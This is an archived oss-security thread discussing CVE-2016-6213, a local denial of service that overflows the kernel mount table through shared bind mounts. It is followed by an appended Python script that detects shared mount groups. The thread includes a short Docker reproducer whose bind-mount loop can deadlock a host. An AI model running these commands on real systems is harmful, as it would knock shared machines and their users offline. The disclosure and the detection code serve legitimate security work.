oss-sec mailing list archives

Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount


From: Jessica Frazelle <me () jessfraz com>
Date: Thu, 14 Jul 2016 12:26:42 -0400

it's running systemd in a container... isn't it...

On Thu, Jul 14, 2016 at 12:18 PM, Jessica Frazelle <me () jessfraz com> wrote:
what is the use case for mounting /mnt:/mnt in a container?

On Thu, Jul 14, 2016 at 12:15 PM, CAI Qian <caiqian () redhat com> wrote:
Maybe this is a better reproducer using docker. It is exploitable even with
user namespace enabled.

# docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash

# cat /proc/self/uid_map
         0        995      65536

# cat /proc/self/gid_map
         0        992      65536

(inside container) # for i in `seq 1 20`; do mount -o bind /mnt/1 /mnt/2; done
   CAI Qian

----- Original Message -----
From: "Greg KH" <greg () kroah com>
To: oss-security () lists openwall com
Cc: caiqian () redhat com, cve-assign () mitre org
Sent: Wednesday, July 13, 2016 6:45:00 PM
Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount

On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign () mitre org wrote:
It was reported that the mount table expands by a power-of-two
with each bind mount command.

If the system is configured in a way that allows a non-root user
to bind mount, even with a limited number of bind mounts
allowed, a non-root user could cause a local DoS by quickly
overflowing the mount table.

it will cause a deadlock for the whole system,

form of unlimited memory consumption that is causing the problem

Use CVE-2016-6213.

A CVE for an "improperly configured system"?  Huh?  What distro has such
a configuration set by default?  This isn't a kernel bug, so what is
this CVE classified as being "against"?  It better not be against the
Linux kernel...

confused,

greg k-h




--


Jessie Frazelle
4096R / D4C4 DD60 0D66 F65A 8EFC  511E 18F3 685C 0022 BFF3
pgp.mit.edu
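As a defender-side illustration of the power-of-two growth the report describes, the following Python is an added example (not code from the thread, Red Hat or Docker): it parses constructed /proc/self/mountinfo lines, counts mounts per shared peer group, and computes how many of the reproducer's bind mounts would push the largest group past a mount budget. The sample lines are constructed, and the default budget of 100000 is an assumption taken from the per-namespace fs.mount-max sysctl later added to the kernel.

```python
from collections import Counter
# Constructed /proc/self/mountinfo sample, not taken from the thread. The
# optional fields between the mount options and " - " carry propagation
# tags such as "shared:42"; a private mount has no such tag.
SAMPLE_MOUNTINFO = """\
25 0 253:0 / / rw,relatime shared:1 - xfs /dev/mapper/root rw
60 25 8:16 / /mnt rw,relatime shared:42 - ext4 /dev/sdb1 rw
61 60 8:16 /1 /mnt/2 rw,relatime shared:42 - ext4 /dev/sdb1 rw
62 61 8:16 /1 /mnt/2/2 rw,relatime shared:42 - ext4 /dev/sdb1 rw
63 25 0:20 / /proc rw,nosuid - proc proc rw
"""

def parse_mountinfo(text):
    """Return (mount_id, mountpoint, peer_group or None) for each line."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # fields: id parent major:minor root mountpoint options [tags...]
        head = line.partition(" - ")[0].split()
        peer = None
        for tag in head[6:]:
            if tag.startswith("shared:"):
                peer = int(tag.split(":", 1)[1])
        mounts.append((int(head[0]), head[4], peer))
    return mounts

def shared_groups(mounts):
    """Mount count per shared peer group; only these replicate bind mounts."""
    return Counter(peer for _, _, peer in mounts if peer is not None)

def doublings_until(limit, peers):
    """Bind mounts of one shared-group subpath onto another needed before the
    group exceeds `limit`: every peer gets a copy, so the group doubles."""
    n, steps = peers, 0
    while n <= limit:
        n, steps = n * 2, steps + 1
    return steps

def assess(text, limit=100000):
    """Summarise one mountinfo snapshot against an assumed mount budget."""
    mounts = parse_mountinfo(text)
    groups = shared_groups(mounts)
    largest = max(groups.values(), default=0)
    return {
        "total_mounts": len(mounts),
        "shared_groups": dict(groups),
        "binds_to_exceed": doublings_until(limit, largest) if largest else None,
    }
```

Feeding a container's real /proc/self/mountinfo to assess() shows whether any of its mounts sit in a shared peer group at all; a container with only private mounts cannot propagate binds back to the host.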

